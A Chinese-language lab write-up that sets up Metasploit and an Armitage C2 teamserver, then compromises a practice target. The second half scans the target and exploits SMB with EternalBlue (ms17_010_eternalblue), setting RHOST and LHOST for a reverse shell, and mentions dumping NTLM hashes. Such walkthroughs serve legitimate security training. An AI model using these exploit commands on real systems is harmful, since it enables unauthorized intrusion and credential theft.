设置C2服务器

前提条件—下载msf

采用一款免费的C2服务器–Armitage,他依赖msf框架,所以还是先下载msf
官方给的下载方式

1
2
3
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall

这一步会直接下载好依赖项和msf本身

安装Armitage

下载、构建和安装 Armitage

1
git clone https://gitlab.com/kalilinux/packages/armitage.git && cd armitage


然后运行构建脚本(在这一步之前首先要先装有java,版本不能太高java11就行sudo apt install openjdk-11-jdk

1
bash package.sh

这步挺困难的,难在代理问题,经测试是网上十点左右,用香港节点是下载所需的压缩包最快的

这一步结束之后就是检查并验证Armitage是否能够成功构建,构建好的版本在./releases/unix/

1
cd ./release/unix/ && ls -la

准备我们的环境

初始化数据库,在此步骤要退出root账户

1
msfdb --use-defaults delete
1
msfdb --use-defaults init

启动和连接到 Armitage

先到armitage二进制文件的目录下(比如~/armitage/release/unix),同时要切换成root账户启动服务端(这里ip和密码自定义的)

1
MSF_DATABASE_CONFIG=/home/用户名/.msf4/database.yml ./teamserver 192.168.28.142 passwd

设置一下环境变量

1
echo 'export MSF_DATABASE_CONFIG="$HOME/.msf4/database.yml"' >> ~/.bashrc && source ~/.bashr

然后就能直接启动了

1
./teamserver 192.168.28.142 root


然后运行客户端

1
./armitage


随便取名

然后就是工具界面了

打靶

啊重启了以后,还是同一个界面👇

端口扫描

在进行这一步之前,要先安装nmap
靶场启动后,先进行端口扫描:Hosts->Nmap Scan->Quick Scan

然后输入靶场地址

扫描结果如下

漏洞利用

看到445端口有开放,再加上是靶场,那大概率就是要打永恒之蓝了,在exp中找到永恒之蓝,然后双击或者拖到页面上的电脑那(这里也是由于网络问题,没有扫出靶机是什么系统的)

然后点击Launch就是利用漏洞
由于网络问题,我利用了三次才成功()

shell以后,右键主机->shell->Interact就能进行交互了

然后还是经典的网络问题,交互过程很卡

转换权限

为了更好操作,还是获取msf shell比较好,选择post->multi->manage->shell_to_meterpreter

结果貌似没提成功啊

那就直接用msf
选择漏洞

1
use exploit/windows/smb/ms17_010_eternalblue

设置靶机地址

1
set RHOST 10.10.191.189

设置本地地址

1
set LHOST 10.17.9.224

然后启动

回答房间问题

NTLM hash

剩下两个找flag要快的话,根据房间中的路径直接查就行了